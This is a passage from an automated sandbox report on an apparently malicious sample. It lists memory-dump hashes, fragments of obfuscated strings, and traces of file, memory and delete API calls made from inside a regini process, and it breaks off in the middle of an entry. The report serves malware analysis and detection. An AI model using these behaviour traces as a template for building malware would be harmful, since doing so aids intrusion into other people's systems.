                                                                              • Snapshot File: hcaresult_5_2_3340000_QmkRHPDwxbW.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 9876ff65cf99fbcb134ae5e6b24bdf36a331eb940c4678bf21c84af0e43dacc2
                                                                              • Instruction ID: c5d8b5ddc9a3e07e7d309ab540d0054919cc14cbdc75426d3220b2d56347813c
                                                                              • Opcode Fuzzy Hash: 9876ff65cf99fbcb134ae5e6b24bdf36a331eb940c4678bf21c84af0e43dacc2
                                                                              • Instruction Fuzzy Hash: 42F01CB5200249BFC710DE99DC81EDB77ADEFC9714F008409F918AB281D771B9118BB5
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3754837830.0000000003340000.00000040.00000001.00040000.00000000.sdmp, Offset: 03340000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_3340000_QmkRHPDwxbW.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 7b85b7b452bad1034da5be4d93268f30a6fbe58fe169f2f5b867a2ad2e5346f3
                                                                              • Instruction ID: 40a8f09de37c6953a8d6552ef44792a3be99c627e598c0caeea1079e98d43637
                                                                              • Opcode Fuzzy Hash: 7b85b7b452bad1034da5be4d93268f30a6fbe58fe169f2f5b867a2ad2e5346f3
                                                                              • Instruction Fuzzy Hash: B0F08271C0520DEBDB14CFA4D841BEEBBB8EB04320F1483AAE9259B2C0E63597518785
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3754837830.0000000003340000.00000040.00000001.00040000.00000000.sdmp, Offset: 03340000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_3340000_QmkRHPDwxbW.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 9a88fbf9543032f2133e8a9cac2bb7711bd7b960dc0391e09488a6e464b12435
                                                                              • Instruction ID: 80dd2627a143fb463fa77f9f026709b62a637bd4bc4809f52138a7cfff0c4a33
                                                                              • Opcode Fuzzy Hash: 9a88fbf9543032f2133e8a9cac2bb7711bd7b960dc0391e09488a6e464b12435
                                                                              • Instruction Fuzzy Hash: 55E06DB52083057FCA10EE59DC41EAB33ADEFC9715F004419F908AB241CB71B810C6B4
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3754837830.0000000003340000.00000040.00000001.00040000.00000000.sdmp, Offset: 03340000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_3340000_QmkRHPDwxbW.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 3702d0d68fbf5931610e7ca1ac5024be2ca3cab5c8f530832197e6ae2b4eb132
                                                                              • Instruction ID: 679a01558ef4dabc0639019cd15a61ebe6bcd06f65bff093dfe9ca9e5132e734
                                                                              • Opcode Fuzzy Hash: 3702d0d68fbf5931610e7ca1ac5024be2ca3cab5c8f530832197e6ae2b4eb132
                                                                              • Instruction Fuzzy Hash: 20E04F7BA1132437C6349699AC05FA7B76DDFC1A60F090165FE089B294E576B90142E4
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3754837830.0000000003340000.00000040.00000001.00040000.00000000.sdmp, Offset: 03340000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_3340000_QmkRHPDwxbW.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 865acb2d5640172cea7701e8b8a714ff6b9d74cb1f623fdfa03c7267b3d5827b
                                                                              • Instruction ID: e83096fa8d37c81d20b3f50cade02517e4e41ab5b9b2950546515eecd1c8dbbc
                                                                              • Opcode Fuzzy Hash: 865acb2d5640172cea7701e8b8a714ff6b9d74cb1f623fdfa03c7267b3d5827b
                                                                              • Instruction Fuzzy Hash: 4AE04F75200214BBC220EA5ADC40EAB776CEFC6714F108419FA096B281C771B911C7B0
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3754837830.0000000003340000.00000040.00000001.00040000.00000000.sdmp, Offset: 03340000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_3340000_QmkRHPDwxbW.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: b27746691c9559bf58dae695fde518ee3984b34b56c81d7783ddd682c46e26cc
                                                                              • Instruction ID: 6c67af10ca6a0dde32e6ec09c198b9b64e7aa8500fe5e0c6d30f912e7a3ece8d
                                                                              • Opcode Fuzzy Hash: b27746691c9559bf58dae695fde518ee3984b34b56c81d7783ddd682c46e26cc
                                                                              • Instruction Fuzzy Hash: 60E02B37C001165F87268F5D9C40886F7D9EA852323250323FC7C5F350EA32C81287E4
                                                                              Strings
                                                                              • String ID: $$$$%$)$)$.$5$>$B$E$F$F$H$J$Q$T$g$h$i$m$s$u$urlmon.dll$v$w$}$}
                                                                              • API String ID: 0-1002149817
                                                                              • String ID: $2$I$I$\$e$g$i$l$l$m$o$r$r$r$r$t$t$t$x
                                                                              • API String ID: 0-3236418099
                                                                              • String ID: %218$%8>3$/xfn$/xfnyg$24<8$;;6x$W$bygw$effe$lw%!$mfny$wcye$xegf$yg
                                                                              • API String ID: 0-3957564025
                                                                              • String ID: $.$F$P$e$i$l$m$o$o$r$s$x
                                                                              • API String ID: 0-392141074
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3754837830.0000000003340000.00000040.00000001.00040000.00000000.sdmp, Offset: 03340000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_3340000_QmkRHPDwxbW.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: $.$F$P$e$i$l$m$o$o$r$s$x
                                                                              • API String ID: 0-392141074
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3754837830.0000000003340000.00000040.00000001.00040000.00000000.sdmp, Offset: 03340000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_3340000_QmkRHPDwxbW.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: D$\$e$e$i$l$n$r$r$w$x
                                                                              • API String ID: 0-685823316
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3754837830.0000000003340000.00000040.00000001.00040000.00000000.sdmp, Offset: 03340000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_3340000_QmkRHPDwxbW.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: D$\$e$e$i$l$n$r$r$w$x
                                                                              • API String ID: 0-685823316
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3754837830.0000000003340000.00000040.00000001.00040000.00000000.sdmp, Offset: 03340000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_3340000_QmkRHPDwxbW.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: :$:$:$A$I$N$P$m$s$t
                                                                              • API String ID: 0-2304485323
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3754837830.0000000003340000.00000040.00000001.00040000.00000000.sdmp, Offset: 03340000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_3340000_QmkRHPDwxbW.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: .$P$e$i$m$o$r$x
                                                                              • API String ID: 0-620024284
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3754837830.0000000003340000.00000040.00000001.00040000.00000000.sdmp, Offset: 03340000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_3340000_QmkRHPDwxbW.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: .$P$e$i$m$o$r$x
                                                                              • API String ID: 0-620024284
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3754837830.0000000003340000.00000040.00000001.00040000.00000000.sdmp, Offset: 03340000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_3340000_QmkRHPDwxbW.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: F$HR8|$P$T$f$r$x
                                                                              • API String ID: 0-2916646499
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3754837830.0000000003340000.00000040.00000001.00040000.00000000.sdmp, Offset: 03340000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_3340000_QmkRHPDwxbW.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: L$S$\$a$c$e$l
                                                                              • API String ID: 0-3322591375
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3754837830.0000000003340000.00000040.00000001.00040000.00000000.sdmp, Offset: 03340000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_3340000_QmkRHPDwxbW.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: $)$1$W$i$u$z
                                                                              • API String ID: 0-2316511558
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3754837830.0000000003340000.00000040.00000001.00040000.00000000.sdmp, Offset: 03340000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_3340000_QmkRHPDwxbW.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: F$HR8|$P$T$f$r$x
                                                                              • API String ID: 0-2916646499
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3754837830.0000000003340000.00000040.00000001.00040000.00000000.sdmp, Offset: 03340000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_3340000_QmkRHPDwxbW.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: FALSETRUE$FALSETRUE$TRUE$TRUE$XD:.$XD:.
                                                                              • API String ID: 0-1677842498
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3754837830.0000000003340000.00000040.00000001.00040000.00000000.sdmp, Offset: 03340000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_3340000_QmkRHPDwxbW.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: FALSETRUE$FALSETRUE$TRUE$TRUE$XD:.$XD:.
                                                                              • API String ID: 0-1677842498
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3754837830.0000000003340000.00000040.00000001.00040000.00000000.sdmp, Offset: 03340000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_3340000_QmkRHPDwxbW.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: $`}<7$e$h$o
                                                                              • API String ID: 0-2995952733
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3754837830.0000000003340000.00000040.00000001.00040000.00000000.sdmp, Offset: 03340000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_3340000_QmkRHPDwxbW.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: $i$l$o$u
                                                                              • API String ID: 0-2051669658
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3754837830.0000000003340000.00000040.00000001.00040000.00000000.sdmp, Offset: 03340000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_3340000_QmkRHPDwxbW.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: $i$l$o$u
                                                                              • API String ID: 0-2051669658
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3754837830.0000000003340000.00000040.00000001.00040000.00000000.sdmp, Offset: 03340000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_3340000_QmkRHPDwxbW.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: $`}<7$e$h$o
                                                                              • API String ID: 0-2995952733
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3754837830.0000000003340000.00000040.00000001.00040000.00000000.sdmp, Offset: 03340000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_3340000_QmkRHPDwxbW.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: -$4$7$K$n
                                                                              • API String ID: 0-870729904
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3754837830.0000000003340000.00000040.00000001.00040000.00000000.sdmp, Offset: 03340000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_3340000_QmkRHPDwxbW.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: $e$k$o
                                                                              • API String ID: 0-3624523832
                                                                              • Opcode ID: 78fa671354e13a79581fac346973dc85d0ce1f5460e9580bc8d6460be4cf8ea4
                                                                              • Instruction ID: bbd153a545228757d40b8a0371f737e512aaa08deeafac8cb437ae066913c0fa
                                                                              • Opcode Fuzzy Hash: 78fa671354e13a79581fac346973dc85d0ce1f5460e9580bc8d6460be4cf8ea4
                                                                              • Instruction Fuzzy Hash: 01B11BB5A00708AFDB24DBA4CC84FEFB7FDAF88700F148559F6199B280D775AA418B50
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3754837830.0000000003340000.00000040.00000001.00040000.00000000.sdmp, Offset: 03340000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_3340000_QmkRHPDwxbW.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: $e$k$o
                                                                              • API String ID: 0-3624523832
                                                                              • Opcode ID: 55d497db76a058dfbbaf498d0c24dc318a361b055d5e613071fadb163fed12ad
                                                                              • Instruction ID: 95c3762dfbd12808979852817cdd5c18e764258a6c8e42eacf4286b8e371aedc
                                                                              • Opcode Fuzzy Hash: 55d497db76a058dfbbaf498d0c24dc318a361b055d5e613071fadb163fed12ad
                                                                              • Instruction Fuzzy Hash: 8D612BB5A00308AFDB54DFA5CC84FEFB7BDAF89700F148559E6199B284D731AA41CB60
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3754837830.0000000003340000.00000040.00000001.00040000.00000000.sdmp, Offset: 03340000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_3340000_QmkRHPDwxbW.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: $e$k$o
                                                                              • API String ID: 0-3624523832
                                                                              • Opcode ID: aa728dcfc576523440c368e4b4f6c831cab588264d65d35986e3c5fe40eedf1f
                                                                              • Instruction ID: 151e14d49297ed757e2644b2a8a2f9ffdacb367881cc79e2a2eb746e8069245e
                                                                              • Opcode Fuzzy Hash: aa728dcfc576523440c368e4b4f6c831cab588264d65d35986e3c5fe40eedf1f
                                                                              • Instruction Fuzzy Hash: 950184B2900318ABDB14DF99D884ADEF7B9FF48314F048259E9195F241E7729949CBB0

                                                                              Execution Graph

                                                                              Execution Coverage:2.6%
                                                                              Dynamic/Decrypted Code Coverage:4.3%
                                                                              Signature Coverage:2.3%
                                                                              Total number of Nodes:440
                                                                              Total number of Limit Nodes:71

                                                                              Control-flow Graph

                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.3750507346.0000000002400000.00000040.80000000.00040000.00000000.sdmp, Offset: 02400000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_2400000_regini.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: "$%$&f$.@$<|$?:$F$I>$V.$W$X}$bG$dg$e%V.$hr$jO$p4$v${${P${]$~$h
                                                                              • API String ID: 0-844827240
                                                                              • Opcode ID: ac7da862727fc6b8ce3562a83cbb3a05bdba5c06911e5096e2b802a0b0289dc5
                                                                              • Instruction ID: 906f3945e8d1105a18d2380485be95fb4fb8e1ee4b9d3c58c8c6247a564baf8f
                                                                              • Opcode Fuzzy Hash: ac7da862727fc6b8ce3562a83cbb3a05bdba5c06911e5096e2b802a0b0289dc5
                                                                              • Instruction Fuzzy Hash: 8A226CB0D05229CBEB24CF55C998BDDBBB1BB45308F1082EAC54D6B280D7B95AC9CF54
                                                                              APIs
                                                                              • FindFirstFileW.KERNELBASE(?,00000000), ref: 0241C9B4
                                                                              • FindNextFileW.KERNELBASE(?,00000010), ref: 0241C9EF
                                                                              • FindClose.KERNELBASE(?), ref: 0241C9FA
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.3750507346.0000000002400000.00000040.80000000.00040000.00000000.sdmp, Offset: 02400000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_2400000_regini.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Find$File$CloseFirstNext
                                                                              • String ID:
                                                                              • API String ID: 3541575487-0
                                                                              • Opcode ID: 3e55da1cfd8cad6bbb757cd532cfe8eb3c10e6acfd91596a3322c7845f83d105
                                                                              • Instruction ID: ac124fa2fd66a705e654a6de893c80c9e549146a35bdb37765bb0c06894b6825
                                                                              • Opcode Fuzzy Hash: 3e55da1cfd8cad6bbb757cd532cfe8eb3c10e6acfd91596a3322c7845f83d105
                                                                              • Instruction Fuzzy Hash: C7318E72A40308BBEB20DFA1CCC5FEF777D9F44744F10455AB91CA6180DBB0AA848BA1
                                                                              APIs
                                                                              • NtCreateFile.NTDLL(?,24064BBE,?,?,?,?,?,?,?,?,?), ref: 024294E8
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.3750507346.0000000002400000.00000040.80000000.00040000.00000000.sdmp, Offset: 02400000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_2400000_regini.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CreateFile
                                                                              • String ID:
                                                                              • API String ID: 823142352-0
                                                                              • Opcode ID: 89953b318f57b8eeb3b94e37ccb434cef16c25349bd0a665c16f5a89a13f60d4
                                                                              • Instruction ID: e434e911b8fb2cfb0d2b194b815d8e8585ba6eaadfcf03e79c8d897e82bc0918
                                                                              • Opcode Fuzzy Hash: 89953b318f57b8eeb3b94e37ccb434cef16c25349bd0a665c16f5a89a13f60d4
                                                                              • Instruction Fuzzy Hash: BE31D5B5A01258ABCB14DF99D880EEEB7B9EF8C300F508219F919A7344D730A9558FA4
                                                                              APIs
                                                                              • NtReadFile.NTDLL(?,24064BBE,?,?,?,?,?,?,?), ref: 02429633
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.3750507346.0000000002400000.00000040.80000000.00040000.00000000.sdmp, Offset: 02400000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_2400000_regini.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: FileRead
                                                                              • String ID:
                                                                              • API String ID: 2738559852-0
                                                                              • Opcode ID: d010eacb628a258346aa53aefa1bed7b249c9d68a6701697dc2ea1d6fb028099
                                                                              • Instruction ID: 7013eb03738123afe2fc74c93ead22af4765b7f12f9e4873cf1a14bae906d0b0
                                                                              • Opcode Fuzzy Hash: d010eacb628a258346aa53aefa1bed7b249c9d68a6701697dc2ea1d6fb028099
                                                                              • Instruction Fuzzy Hash: 4B31EAB5A00258ABCB14DF99C880EEF77B9EF88310F10861AFD19A7344D770A9518FA5
                                                                              APIs
                                                                              • NtAllocateVirtualMemory.NTDLL(024120BB,24064BBE,024281DF,00000000,00000004,00003000,?,?,?,?,?,024281DF,024120BB), ref: 02429912
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.3750507346.0000000002400000.00000040.80000000.00040000.00000000.sdmp, Offset: 02400000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_2400000_regini.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: AllocateMemoryVirtual
                                                                              • String ID:
                                                                              • API String ID: 2167126740-0
                                                                              • Opcode ID: cedafb1025b038325b921a273ed17e15dc8af73268ddac6631b876435128dcc7
                                                                              • Instruction ID: 2b2e92c80e7a79536b5c396f675591a0b8f9cbaa4449d50ecec43161f83eb838
                                                                              • Opcode Fuzzy Hash: cedafb1025b038325b921a273ed17e15dc8af73268ddac6631b876435128dcc7
                                                                              • Instruction Fuzzy Hash: 6D212BB5A00258ABDB10DF99DC41FEF77BAEF88300F10851EFD18A7244D770A9118BA5
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.3750507346.0000000002400000.00000040.80000000.00040000.00000000.sdmp, Offset: 02400000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_2400000_regini.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: DeleteFile
                                                                              • String ID:
                                                                              • API String ID: 4033686569-0
                                                                              • Opcode ID: e2871cfb3dc0ff402a426fcbebe61238aa19fe36c2eaceb1abd14c6b07a2ed57
                                                                              • Instruction ID: 116f78e22bc1c5d1d5020d977142c4c7919e56ca5694acd1b8fbe8d33b9afc3e
                                                                              • Opcode Fuzzy Hash: e2871cfb3dc0ff402a426fcbebe61238aa19fe36c2eaceb1abd14c6b07a2ed57
                                                                              • Instruction Fuzzy Hash: 4B11A071A002187BD620EB66CC41FAF73ADEF85704F40454EFA1C6B280E77579158BE5
                                                                              APIs
                                                                              • NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 02429717
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.3750507346.0000000002400000.00000040.80000000.00040000.00000000.sdmp, Offset: 02400000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_2400000_regini.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Close
                                                                              • String ID:
                                                                              • API String ID: 3535843008-0
                                                                              • Opcode ID: 865acb2d5640172cea7701e8b8a714ff6b9d74cb1f623fdfa03c7267b3d5827b
                                                                              • Instruction ID: 928e0f9d8b2874fcd3952001ba9e6d87657e4a78d9b6fc3e5e7ba0876e66ad8b
                                                                              • Opcode Fuzzy Hash: 865acb2d5640172cea7701e8b8a714ff6b9d74cb1f623fdfa03c7267b3d5827b
                                                                              • Instruction Fuzzy Hash: 0BE04F352002147BC220AA6ADC40FAB775DDFC6710F108819FA4D77240C671791087F0
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.3755692456.0000000002B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                              • Associated: 00000007.00000002.3755692456.0000000002C39000.00000040.00001000.00020000.00000000.sdmp
                                                                              • Associated: 00000007.00000002.3755692456.0000000002C3D000.00000040.00001000.00020000.00000000.sdmp
                                                                              • Associated: 00000007.00000002.3755692456.0000000002CAE000.00000040.00001000.00020000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_2b10000_regini.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: bc771f31e00e7717566d338aebd48cba6bdd53abdc1809b3578acba54ae3d875
                                                                              • Instruction ID: 10a8630663433a75965193aed2425aa9c2b87ce7b07c47b47954d749c11a12ea
                                                                              • Opcode Fuzzy Hash: bc771f31e00e7717566d338aebd48cba6bdd53abdc1809b3578acba54ae3d875
                                                                              • Instruction Fuzzy Hash: 9F90023260580012954071584884547400597E1301B55C061E0528555C8A148A565365
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.3755692456.0000000002B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                              • Associated: 00000007.00000002.3755692456.0000000002C39000.00000040.00001000.00020000.00000000.sdmp
                                                                              • Associated: 00000007.00000002.3755692456.0000000002C3D000.00000040.00001000.00020000.00000000.sdmp
                                                                              • Associated: 00000007.00000002.3755692456.0000000002CAE000.00000040.00001000.00020000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_2b10000_regini.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: 6d47d3410e37b3d4b116479dd333f95c3b3129f43e8725005b6337dd0a6936af
                                                                              • Instruction ID: 8753e1237546bace819167ba909bef874d3536c9026e9758065804633d81ff6e
                                                                              • Opcode Fuzzy Hash: 6d47d3410e37b3d4b116479dd333f95c3b3129f43e8725005b6337dd0a6936af
                                                                              • Instruction Fuzzy Hash: 8890027260150042454071584804407600597E2301395C165E0658561C86188955926D
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.3755692456.0000000002B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                              • Associated: 00000007.00000002.3755692456.0000000002C39000.00000040.00001000.00020000.00000000.sdmp
                                                                              • Associated: 00000007.00000002.3755692456.0000000002C3D000.00000040.00001000.00020000.00000000.sdmp
                                                                              • Associated: 00000007.00000002.3755692456.0000000002CAE000.00000040.00001000.00020000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_2b10000_regini.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: 360810982bc4e3a0ed9f54e32f4f3fb3266b6c878a4fde357ed43f3c541d02d3
                                                                              • Instruction ID: 096609e0007273e7890e86b697533c49f8b5e696c1a7bd526ba8f63cf832a6da
                                                                              • Opcode Fuzzy Hash: 360810982bc4e3a0ed9f54e32f4f3fb3266b6c878a4fde357ed43f3c541d02d3
                                                                              • Instruction Fuzzy Hash: 15900236221400020545B558060450B044597D7351395C065F151A591CC62189655325
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.3755692456.0000000002B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                              • Associated: 00000007.00000002.3755692456.0000000002C39000.00000040.00001000.00020000.00000000.sdmp
                                                                              • Associated: 00000007.00000002.3755692456.0000000002C3D000.00000040.00001000.00020000.00000000.sdmp
                                                                              • Associated: 00000007.00000002.3755692456.0000000002CAE000.00000040.00001000.00020000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_2b10000_regini.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: 9b933dab8ac00e8563b29037e972f17cb7a1b0eb995c566e3f1df738996de265
                                                                              • Instruction ID: 4258c177ddb2a76a5039e1370ff7f49bb0d70183d54e55d4a83190e720257728
                                                                              • Opcode Fuzzy Hash: 9b933dab8ac00e8563b29037e972f17cb7a1b0eb995c566e3f1df738996de265
                                                                              • Instruction Fuzzy Hash: FE900437311400030505F55C07045070047C7D7351355C071F111D551CD731CD715135
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.3755692456.0000000002B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                              • Associated: 00000007.00000002.3755692456.0000000002C39000.00000040.00001000.00020000.00000000.sdmp
                                                                              • Associated: 00000007.00000002.3755692456.0000000002C3D000.00000040.00001000.00020000.00000000.sdmp
                                                                              • Associated: 00000007.00000002.3755692456.0000000002CAE000.00000040.00001000.00020000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_2b10000_regini.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: 73a40fad0d6aab53520146d3f03d8251810750bf45f892b4c0c4cad5e1c93e3c
                                                                              • Instruction ID: a2aec4f293a2223d3b7f0ce3fdb7a9cb07fe4092effeaf0189dce101fe214409
